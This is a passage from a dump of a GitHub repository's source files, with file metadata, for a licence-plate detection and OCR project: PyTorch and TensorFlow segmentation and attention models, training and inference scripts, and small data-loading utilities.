"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1968,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 56,
"path": "/cv/pytorch/pytorch_utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import torch\n\nfrom cv.pytorch.unet import (crop_img)\n\n\ndef save_model(model, path):\n torch.save(model.state_dict(), path)\n\n\ndef load_model(model_class, path, *args, **kwargs):\n model = model_class(*args, **kwargs)\n model.load_state_dict(torch.load(path))\n model.eval()\n\n\ndef standardize(tensor, size, im_channels):\n if type(tensor) != torch.Tensor:\n t_shape = tensor.shape\n new_shape = (t_shape[0], t_shape[3], t_shape[1], t_shape[2])\n tensor = torch.tensor(tensor)\n tensor = torch.reshape(tensor, new_shape)\n return tensor\n\n\ndef train_model(x_train, y_train, x_val, y_val, model_definition,\n params, logger):\n size = params['dsize']\n im_channels = params['im_channels']\n model_params = params['model_params']\n x_train = standardize(x_train, size, im_channels)\n y_train = standardize(y_train, size, im_channels)\n x_val = standardize(x_val, size, im_channels)\n y_val = standardize(y_val, size, im_channels)\n model = model_definition(**model_params)\n epochs = 10\n delta = 1 + (epochs // 10)\n criterion = torch.nn.MSELoss(reduction='mean')\n optimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\n logger.info(f\"Iterating through epochs\")\n shape1 = x_train.shape[1:4]\n shape2 = y_train.shape[1:4]\n for t in range(epochs):\n for idx in range(len(x_train)):\n x = torch.reshape(x_train[idx, :, :, :], (1, *shape1))\n y = torch.reshape(y_train[idx, :, :, :], (1, *shape2))\n y_pred = model(x)\n loss = criterion(y_pred, crop_img(y, y_pred))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n logger.info(f\"Epoch, image: [{t}, {idx}]\")\n if t % delta == (delta - 1):\n logger.info(f\"Loss [{t}]: {loss.item()}\")\n save_model(model, params['model_file'])\n load_model(model_definition, params['model_file'], **model_params)\n return model\n"
},
{
"alpha_fraction": 0.5301143527030945,
"alphanum_fraction": 0.5789072513580322,
"avg_line_length": 35.775699615478516,
"blob_id": "3d480accaca05379d0c74c70ddc37b7d3a43fcc4",
"content_id": "0d7f4dada0d70d4c3733954087d2ff88e037baa4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3935,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 107,
"path": "/cv/tensorflow_models/unet2text2.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Lambda, Input,\n MaxPooling2D)\n\n\ndef identity_function(x):\n return x\n\n\ndef normalize_image_shape(height, width):\n base = (2 ** 4)\n width = (width // base) * base + base * int(width > 0)\n height = (height // base) * base + base * int(height > 0)\n return height, width\n\n\ndef compose_fs(functions):\n def composed_function(x):\n for f in functions:\n x = f(x)\n return x\n\n return composed_function\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n inputs = Input((img_height, img_width, in_channels))\n x = Lambda(lambda aux: aux / 255)(inputs)\n # Downward\n kwargs_conv2d = {\n 'activation': 'relu',\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n k_size = (3,) * 2\n h_dim = 10\n h1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n h1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h1)\n h2 = MaxPooling2D((2, 2))(h1)\n h2 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h2)\n h2 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h2)\n h3 = MaxPooling2D((2, 2))(h2)\n h3 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h3)\n h3 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h3)\n fg = compose_fs([\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(out_channels * 2),\n tf.keras.layers.Dense(out_channels),\n tf.keras.layers.Softmax(axis=1),\n tf.keras.layers.Reshape((-1, 1, 1, 37)),\n ])\n outputs = []\n for it in range(13):\n # First glimpse\n a1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n a1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a1)\n a1 = Conv2D(2, kernel_size=k_size, **kwargs_conv2d)(a1)\n a1 = tf.keras.layers.Softmax(axis=-1)(a1)\n a1 = a1[:, :, :, 0:1]\n a1 = tf.tile(a1, multiples=[1, 1, 1, h1.shape[-1]])\n g1 = tf.concat([h1, a1 * h1], axis=-1)\n # Second glimpse\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(g1)\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = MaxPooling2D((2, 2))(a2)\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = Conv2D(2, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = tf.keras.layers.Softmax(axis=-1)(a2)\n a2 = a2[:, :, :, 0:1]\n a2 = tf.tile(a2, multiples=[1, 1, 1, h2.shape[-1]])\n g2 = tf.concat([h2, a2 * h2], axis=-1)\n # Third glimpse\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(g2)\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = MaxPooling2D((2, 2))(a3)\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = Conv2D(2, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = tf.keras.layers.Softmax(axis=-1)(a3)\n a3 = a3[:, :, :, 0:1]\n a3 = tf.tile(a3, multiples=[1, 1, 1, h3.shape[-1]])\n g3 = tf.concat([h3, a3 * h3], axis=-1)\n # Flattening\n g = fg(g3)\n outputs.append(g)\n outputs = tf.concat(outputs, axis=3)\n outputs = tf.keras.layers.Reshape((-1, 13, 37))(outputs)\n print(outputs.shape)\n # Model compilation\n model = Model(inputs=[inputs], outputs=[outputs])\n model.compile(\n optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']\n )\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.5710601806640625,
"alphanum_fraction": 0.5957019925117493,
"avg_line_length": 31.616823196411133,
"blob_id": "9b3a9d101389faf751c2120d7c5bf0977f307f39",
"content_id": "91b52902c439133cd6b159bb3d70aa3670c7d128",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3490,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 107,
"path": "/cv/tensorflow_models/unet2text3.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Lambda, Input,\n MaxPooling2D)\nimport numpy as np\n\n\ndef identity_function(x):\n return x\n\n\ndef normalize_image_shape(height, width):\n base = (2 ** 4)\n width = (width // base) * base + base * int(width > 0)\n height = (height // base) * base + base * int(height > 0)\n return height, width\n\n\ndef compose_fs(functions):\n def composed_function(x):\n for f in functions:\n x = f(x)\n return x\n\n return composed_function\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n input_image = Input((img_height, img_width, in_channels))\n x = Lambda(lambda aux: aux / 255)(input_image)\n # Downward\n kwargs_conv2d = {\n 'activation': 'relu',\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n timesteps = 13\n abecedary_len = 37\n k_size = (3,) * 2\n h_dim = 50\n\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = MaxPooling2D((2, 2))(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = MaxPooling2D((2, 2))(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = MaxPooling2D((2, 2))(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n\n def position_f(pos):\n pos = np.identity(abecedary_len)[pos]\n pos = np.reshape(pos, (-1, abecedary_len))\n pos = tf.constant(pos, dtype='float32')\n return pos\n\n x2_f = compose_fs((\n Conv2D(2, kernel_size=k_size, **kwargs_conv2d),\n tf.keras.layers.Flatten(),\n ))\n attention_f = compose_fs((\n tf.keras.layers.Dense(h.shape[1] * h.shape[2] * 2),\n tf.keras.layers.Dense(h.shape[1] * h.shape[2] * 2),\n tf.keras.layers.Dense(h.shape[1] * h.shape[2] * 2),\n tf.keras.layers.Reshape((h.shape[1], h.shape[2], 2)),\n tf.keras.layers.Softmax(axis=-1),\n lambda aux: aux[:, :, :, 0:1],\n lambda aux: tf.tile(aux, multiples=[1, 1, 1, h.shape[-1]])\n ))\n glimpse_f = compose_fs((\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(out_channels),\n tf.keras.layers.Softmax(axis=1),\n tf.keras.layers.Reshape((-1, 1, 1, abecedary_len)),\n ))\n outputs = []\n for it in range(timesteps):\n position = position_f(it)\n x2 = x2_f(h)\n x2 = tf.concat([x2, position], axis=-1)\n attention = attention_f(x2)\n glimpse = tf.concat([h, attention * h], axis=-1)\n glimpse = glimpse_f(glimpse)\n outputs.append(glimpse)\n outputs = tf.concat(outputs, axis=3)\n outputs = tf.keras.layers.Reshape((-1, timesteps, abecedary_len))(outputs)\n print(outputs.shape)\n # Model compilation\n model = Model(inputs=[input_image], outputs=[outputs])\n model.compile(\n optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']\n )\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.8035714030265808,
"alphanum_fraction": 0.8035714030265808,
"avg_line_length": 55,
"blob_id": "390d80078e5421f13d1f6c78a4f3f928147c8714",
"content_id": "62026b6871106a59717ee066165820c27c515c71",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 168,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 3,
"path": "/call_service.sh",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "export PYTHONPATH=/home/sebastian/projects/pedro\necho PYTHONPATH: $PYTHONPATH | rm data/plates/alpr/*.png\nconda run -n seg_models_cpu python services/alpr/inference.py\n"
},
{
"alpha_fraction": 0.5994654893875122,
"alphanum_fraction": 0.6158342957496643,
"avg_line_length": 35.50609588623047,
"blob_id": "e63781c4dc6449dab62e4fd2f67dc0eb88135375",
"content_id": "db04e91dc910aed98685c68e1e0409eddb094c93",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5987,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 164,
"path": "/services/plate_segmentation/inference.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import glob\nimport cv2\nimport pandas as pd\n\nfrom cv.image_processing import (\n get_contours_rgb,\n get_warping,\n warp_image,\n pred2im,\n save_image,\n get_rectangle,\n)\nfrom cv.tensorflow_models.unet_little import get_model_definition as plate_seg_model_def\nfrom io_utils.data_source import (\n get_image,\n)\nfrom io_utils.utils import (\n CustomLogger\n)\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/input/'\n output_folder = f'{path}/plates/plate_segmentation'\n # dsize = (576, 576)\n dsize = (256, 256)\n big_shape = (1024, 1024)\n plate_shape = (200, 50)\n color = (255, 0, 0)\n thickness = 3\n debug_level = 1#5\n min_pct = 0.04\n max_pct = 0.20\n min_area = (big_shape[0] * min_pct) * (big_shape[1] * min_pct)\n max_area = (big_shape[0] * max_pct) * (big_shape[1] * max_pct)\n train_files = glob.glob(f\"{input_folder}/train/*.jpg\")\n test_files = glob.glob(f\"{input_folder}/test/*.jpg\")\n files = train_files + test_files\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'files': files,\n 'plate_shape': plate_shape,\n 'color': color,\n 'thickness': thickness,\n 'debug_level': debug_level,\n 'dsize': dsize,\n 'plate_segmentation_model_file': f'{output_folder}/model/best_model.h5',\n 'labels': f\"{input_folder}/labels_plate_text.json\",\n 'metadata': f\"{input_folder}/files.csv\",\n 'big_shape': big_shape,\n 'min_area': min_area,\n 'max_area': max_area,\n 'plate_segmentation_model_params': {\n 'img_height': 256,\n 'img_width': 256,\n 'in_channels': 3,\n 'out_channels': 2,\n },\n }\n return params\n\n\ndef draw_rectangle(im, r):\n if (r is not None) and (len(r) > 0):\n x, y, w, h = r\n im = cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 2)\n return im\n\n\ndef plate_segmentation(event, context):\n logger = context['logger']\n file = event['image_file']\n dsize = context['dsize']\n model = context['plate_segmentation_model']\n in_channels = context['plate_segmentation_model_params']['in_channels']\n preprocess_input = context['plate_segmentation_preprocessing']\n out_folder = context['output_folder']\n big_shape = context['big_shape']\n min_area = context['min_area']\n max_area = context['max_area']\n debug_level = context['debug_level']\n color = context['color']\n thickness = context['thickness']\n plate_shape = context['plate_shape']\n file_debug_name = file.split('/')[-1]\n file_debug_name = file_debug_name.split('.')[0]\n logger = CustomLogger(file_debug_name, logger)\n x = get_image(file, dsize, in_channels)\n x = pred2im(x, dsize, 0, in_channels)\n logger.info(\"Pre process input\")\n # if debug_level > 0:\n # x_debug = cv2.resize(x, dsize=big_shape, interpolation=cv2.INTER_CUBIC)\n # save_image(x_debug, f\"{out_folder}/rectangle_{file_debug_name}_x.png\")\n x = preprocess_input(x)\n logger.info(\"Inference\")\n x = x.reshape(1, dsize[0], dsize[0], 3)\n y = (model.predict(x) * 255).round()\n y = pred2im(y, dsize, 0, 3)\n image = get_image(file, big_shape, in_channels)\n image = pred2im(image, big_shape, 0, in_channels)\n image = image.reshape(big_shape[0], big_shape[0], 3)\n y = cv2.resize(y, dsize=big_shape, interpolation=cv2.INTER_CUBIC)\n logger.info(\"Getting contours\")\n contours = get_contours_rgb(y, min_area, max_area)\n # if debug_level > 0:\n # save_image(255-y, f\"{out_folder}/rectangle_{file_debug_name}_y.png\")\n im_pred = None\n rectangle = None\n image_debug = None\n if len(contours) > 0:\n rectangle = get_rectangle(contours)\n image_debug = cv2.drawContours(image.copy(), [rectangle], 0, color, thickness)\n if debug_level > 0:\n logger.info(f\"Saving rectangle\")\n # save_image(image_debug, f\"{out_folder}/rectangle_{file_debug_name}.png\")\n # image_debug = cv2.drawContours(image.copy(), [box], 0, color, thickness)\n # logger.info(f\"Saving min_area_boxes\")\n # save_image(image_debug, f\"{out_folder}/min_area_box_{file_debug_name}.png\")\n logger.info(\"Warp images\")\n warping = get_warping(rectangle, plate_shape)\n im_pred = warp_image(image, warping, plate_shape)\n logger.info(f\"Saving min_area_boxes\")\n # if debug_level > 0:\n # save_image(im_pred, f\"{out_folder}/plate_{file_debug_name}.png\")\n else:\n logger.info(\"Countours not found\")\n result = {\n 'file': file,\n 'rectangle': rectangle,\n 'len_contours': len(contours),\n 'image': im_pred,\n 'image_debug': image_debug,\n }\n logger.info(f\"contours [{file.split('/')[-1]}]: {len(contours)}\")\n return result\n\n\ndef segment_plates(params):\n from loguru import logger\n\n model_file = params['plate_segmentation_model_file']\n logger.info(\"Loading model\")\n plate_segmentation_model_params = params['plate_segmentation_model_params']\n plate_segmentation_model_file, plate_segmentation_preprocessing = plate_seg_model_def(**plate_segmentation_model_params)\n plate_segmentation_model_file.load_weights(model_file)\n logger.info(\"Loading data\")\n files = params['files']\n context = {\n 'logger': logger,\n 'plate_segmentation_model': plate_segmentation_model_file,\n 'plate_segmentation_preprocessing': plate_segmentation_preprocessing,\n }\n context.update(params)\n events = [{'image_file': f, 'ejec_id': ejec_id} for ejec_id, f in enumerate(files)]\n results = map(lambda e: plate_segmentation(event=e, context=context), events)\n results = map(lambda e: {k: e[k] for k in ('file', 'len_contours')}, results)\n results = pd.DataFrame(results)\n results.to_csv(f\"{params['output_folder']}/events_results.csv\")\n\n\nif __name__ == \"__main__\":\n segment_plates(get_params())\n"
},
{
"alpha_fraction": 0.5967479944229126,
"alphanum_fraction": 0.6032520532608032,
"avg_line_length": 33.16666793823242,
"blob_id": "304abcfeac0a8cd07dd0fa7e89480d4d0b499541",
"content_id": "f862360d81d5eb588b3c54da15454ca06ad210e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 615,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 18,
"path": "/io_utils/data_output.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom PIL import Image\nimport os\n\n\ndef save_inference_images(y_pred, metadata, folder):\n output_folder = f\"{folder}/output\"\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n for id_im, im_file in zip(metadata.idx, metadata.image):\n y_im = y_pred[id_im,:,:,0]\n new_shape = (y_im.shape[0], y_im.shape[1])\n y_im = np.reshape(y_im, new_shape)\n y_im = Image.fromarray(y_im)\n y_im = y_im.convert(\"L\")\n im_filename = im_file.split('.')[0]\n filename = f\"{output_folder}/{im_filename}_pred.jpg\"\n y_im.save(filename)\n"
},
{
"alpha_fraction": 0.47587352991104126,
"alphanum_fraction": 0.5008319616317749,
"avg_line_length": 26.953489303588867,
"blob_id": "0fab8b9edefe0292617d2243faaf7ee085796ced",
"content_id": "4963837aa2ffa513c2828829acaece049eaeab52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1202,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 43,
"path": "/io_utils/read_polygons_json.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: sebastian\n\"\"\"\nimport json\nimport pandas as pd\n\n\ndef __get_image_polygons(row):\n regions = row['regions']\n vals = []\n for region in regions.values():\n label = region['region_attributes']['label']\n x = region['shape_attributes']['all_points_x'][0:-1]\n y = region['shape_attributes']['all_points_y'][0:-1]\n new_val = {\n 'filename': row['filename'],\n 'label': label,\n 'x0': x[0],\n 'y0': y[0],\n 'x1': x[1],\n 'y1': y[1],\n 'x2': x[2],\n 'y2': y[2],\n 'x3': x[3],\n 'y3': y[3],\n }\n new_val = pd.DataFrame.from_dict(new_val, orient='index')\n new_val = new_val.T\n vals.append(new_val)\n vals = pd.concat(vals, axis=0)\n return vals\n\n\ndef get_labels_plates_text(file):\n with open(file) as json_file:\n data = json.load(json_file)\n data = list(data.values())\n data = [__get_image_polygons(row) for row in data]\n data = pd.concat(data, axis=0).reset_index(drop=True)\n int_cols = ['x0', 'y0', 'x1', 'y1', 'x2', 'y2', 'x3', 'y3']\n for c in int_cols:\n data[c] = data[c].astype(int)\n return data\n"
},
{
"alpha_fraction": 0.6504713296890259,
"alphanum_fraction": 0.6584481596946716,
"avg_line_length": 31.83333396911621,
"blob_id": "188692d011b8d51f59f8938e1db4a26417f79e95",
"content_id": "ba28920d49124c3a01b0cf142bd399df938e71e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1379,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 42,
"path": "/services/plate_segmentation/training_segmodels.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import pathlib\n\nfrom loguru import logger\n\nfrom cv.tensorflow_models.tensorflow_utils import train_model\nfrom io_utils.data_source import get_image_label, get_plates_bounding_metadata\nfrom cv.seg_models.model_definition import get_model_definition\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data/'\n folder = f'{path}/plates'\n dsize = (768, 768)\n params = {\n 'folder': folder,\n 'epochs': 1000,\n 'dsize': dsize,\n 'model_folder': f'{folder}/model',\n 'model_file': f'{folder}/model/best_model.h5',\n 'labels': f\"{folder}/labels_plates.csv\",\n 'metadata': f\"{folder}/files.csv\",\n 'model_params': {}\n }\n return params\n\n\ndef train_plate_segmentation(params):\n dsize = params['dsize']\n folder = params['folder']\n metadata = get_plates_bounding_metadata(params)\n train_metadata = metadata.query(\"set == 'train'\")\n test_metadata = metadata.query(\"set == 'test'\")\n train_metadata = set_index(train_metadata)\n test_metadata = set_index(test_metadata)\n x_train, y_train = get_image_label(folder, train_metadata, dsize)\n x_val, y_val = get_image_label(folder, test_metadata, dsize)\n train_model(x_train, y_train, x_val, y_val, get_model_definition, params, logger)\n\n\nif __name__ == \"__main__\":\n train_plate_segmentation(get_params())\n"
},
{
"alpha_fraction": 0.5215553641319275,
"alphanum_fraction": 0.5452240109443665,
"avg_line_length": 30.972972869873047,
"blob_id": "aeb0465bd5e4db85c8d5c4db794bfd7f39631476",
"content_id": "dabb88c64c476f6808070dc22050a712d55b8e50",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1183,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 37,
"path": "/cv/tensorflow_models/cnn_encoder.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\n\n\nclass CNN_Encoder(tf.keras.Model):\n\n def __init__(self, embedding_dim, img_height, img_width):\n super(CNN_Encoder, self).__init__()\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n self.l_preprocessing = tf.keras.layers.Lambda(lambda aux: aux / 255)\n kwargs_conv2d = {\n 'filters': 10,\n 'kernel_size': (3,) * 2,\n 'activation': tf.keras.layers.LeakyReLU(alpha=0.1),\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n self.l_1 = tf.keras.layers.Conv2D(**kwargs_conv2d)\n self.l_2 = tf.keras.layers.Conv2D(**kwargs_conv2d)\n # shape after fc == (batch_size, 64, embedding_dim)\n self.fc_1 = tf.keras.layers.Dense(embedding_dim)\n self.fc_2 = tf.nn.relu\n\n def call(self, x):\n x = self.l_preprocessing(x)\n x = self.l_1(x)\n x = self.l_2(x)\n x = self.fc_1(x)\n x = self.fc_2(x)\n return x\n"
},
{
"alpha_fraction": 0.5111662745475769,
"alphanum_fraction": 0.5620347261428833,
"avg_line_length": 24.1875,
"blob_id": "3bae21da5e518ce9592a2d299c10a04d9959a596",
"content_id": "7e9059fb26fc3d320b0c82100dc4cf2171e5824b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 32,
"path": "/cv/pytorch/tests/test_pytorch_utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\nimport torch\n\nfrom cv.pytorch.pytorch_utils import train_model\nfrom cv.pytorch.unet import (UNet)\n\n\ndef train_model():\n from loguru import logger\n\n logger.info(f\"Start\")\n params = {\n 'path': './test.model',\n 'dsize': (572, 572),\n 'im_channels': 1,\n }\n x_train = torch.rand((1, 1, 572, 572))\n y_train = torch.rand((1, 2, 388, 388))\n x_val = torch.rand((1, 1, 572, 572))\n y_val = torch.rand((1, 2, 388, 388))\n logger.info(f\"Call to train_model\")\n model_params = {\n 'in_channels': 1,\n 'out_channels': 2,\n }\n trained_model = train_model(x_train, y_train, x_val, y_val, UNet,\n model_params, params, logger)\n assert trained_model is not None\n print(trained_model)\n"
},
{
"alpha_fraction": 0.6376953125,
"alphanum_fraction": 0.64501953125,
"avg_line_length": 36.23636245727539,
"blob_id": "46dd67dc6e3ddd63338d045cb4f38896b02be3be",
"content_id": "f42f92aa8195a4d181944bd157e0076f61181f44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4096,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 110,
"path": "/services/plate_ocr/training.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "from loguru import logger\n\nfrom cv.tensorflow_models.tensorflow_utils import train_model_gen\nfrom cv.tensorflow_models.unet2text3 import (\n get_model_definition,\n normalize_image_shape\n)\nfrom io_utils.data_source import (\n get_plates_text_metadata,\n get_image_text_label,\n get_image_text_label_sim\n)\nfrom io_utils.image_text_label_generator import ImageTextLabelGenerator\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/plate_segmentation'\n output_folder = f'{path}/plates/plate_ocr'\n width = 200\n height = 50\n height, width = normalize_image_shape(height, width)\n # height = height + 1\n # width = width + 1\n dsize = (height, width)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n in_channels = 1\n out_channels = len(alphabet)\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'epochs': 1 * 1000,\n 'dsize': dsize,\n 'model_folder': f'{output_folder}/model',\n 'model_file': f'{output_folder}/model/best_model.h5',\n 'metadata': f\"{path}/plates/input/labels/ocr/files.csv\",\n 'alphabet': alphabet,\n 'model_params': {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': in_channels,\n 'out_channels': out_channels,\n },\n }\n return params\n\n\ndef train_ocr_model(params):\n dsize = params['dsize']\n model_params = params['model_params']\n in_folder = params['input_folder']\n alphabet = params['alphabet']\n #\n in_channels = model_params['in_channels']\n out_channels = model_params['out_channels']\n metadata = get_plates_text_metadata(params)\n metadata.file_name = 'plate_' + metadata.file_name\n metadata.file_name = metadata.file_name.str.split('.').str[0] + '.png'\n train_meta = metadata.query(\"set == 'train'\")\n test_meta = metadata.query(\"set == 'test'\")\n train_meta = set_index(train_meta)\n test_meta = set_index(test_meta)\n model, preprocess_input = get_model_definition(**model_params)\n f_train_params = {\n 'folder': in_folder, 'metadata': train_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n f_test_params = {\n 'folder': in_folder, 'metadata': test_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n data_train = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_train_params)\n data_val = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_test_params)\n train_model_gen(data_train, data_val, model, params, logger)\n\n\ndef train_ocr_model_sim(params):\n dsize = params['dsize']\n model_params = params['model_params']\n in_folder = params['input_folder']\n alphabet = params['alphabet']\n #\n in_channels = model_params['in_channels']\n out_channels = model_params['out_channels']\n metadata = get_plates_text_metadata(params)\n metadata.image = 'plates_' + metadata.image\n metadata.image = metadata.image.str.split('.').str[0] + '.png'\n test_meta = metadata.query(\"set == 'test'\")\n test_meta = set_index(test_meta)\n model, preprocess_input = get_model_definition(**model_params)\n f_train_params = {\n 'dsize': dsize, 'in_channels': in_channels,\n 'out_channels': out_channels, 'alphabet': alphabet\n }\n f_test_params = {\n 'folder': in_folder, 'metadata': test_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n data_train = ImageTextLabelGenerator(get_image_text_label_sim, preprocess_input, f_train_params)\n data_val = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_test_params)\n train_model_gen(data_train, data_val, model, params, logger)\n\n\nif __name__ == \"__main__\":\n train_ocr_model(get_params())\n"
},
{
"alpha_fraction": 0.5260456800460815,
"alphanum_fraction": 0.5855786800384521,
"avg_line_length": 35.42055892944336,
"blob_id": "cbc3057f3375e2a2d7359892d956364944bedadb",
"content_id": "9d9a25e47a2aae8553a40b42d5e2d64476965723",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3897,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 107,
"path": "/cv/tensorflow_models/unet2text.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
